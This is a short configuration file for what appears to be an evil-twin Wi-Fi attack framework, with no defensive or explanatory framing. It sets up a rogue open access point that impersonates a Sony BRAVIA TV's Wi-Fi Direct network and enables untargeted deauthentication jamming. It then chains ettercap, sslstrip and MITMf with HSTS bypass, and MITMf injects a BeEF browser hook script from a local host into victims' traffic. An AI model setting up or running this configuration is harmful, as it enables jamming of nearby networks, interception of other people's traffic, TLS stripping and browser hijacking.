[etf]
	[[config_location]]
		dnsmasq_conf = /etc/dnsmasq.conf
		hostapd_conf = /etc/hostapd/hostapd_temp.conf
		networkmanager_conf = /etc/NetworkManager/NetworkManager.conf
	
	[[aircommunicator]]
		[[[aplauncher]]]
			internet_interface = wlan0
			ap_interface = wlan1
			
			[[[[hostapd]]]]
				bssid = 12:a0:96:7d:18:78
				ssid = DIRECT-F7-BRAVIA
				channel = 1
				hw_mode = g
				encryption = None
				password = tttttttt
				auth = PSK
				cipher = CCMP
			
			[[[[dnsmasq]]]]
				gateway = 192.168.2.1
				dhcp_range = 192.168.2.2, 192.168.2.254
				dns_server = 8.8.8.8, 8.8.4.4
		
		[[[airscanner]]]
			sniffing_interface = wlan1
			probes = True
			beacons = True
		
		[[[airdeauthor]]]
			jamming_interface = wlan1
			burst_count = 20
			targeted_only = False
	
	[[spawner]]
		tcp_redirection_port = 10000
		
		[[[ettercap]]]
			system_location = /usr/share/ettercap
			args = -T, -q, -u, -p, -i, wlan1
		
		[[[sslstrip]]]
			system_location = /usr/share/sslstrip
			args = -p, -f, -k
		
		[[[mitmf]]]
			system_location = /usr/share/mitmf
			args = -i, wlan1, --hsts, --inject, --js-url, http://192.168.1.5:3000/hook.js
		
		[[[beef]]]
			system_location = /usr/share/beef-xss
			args = ""


		
		
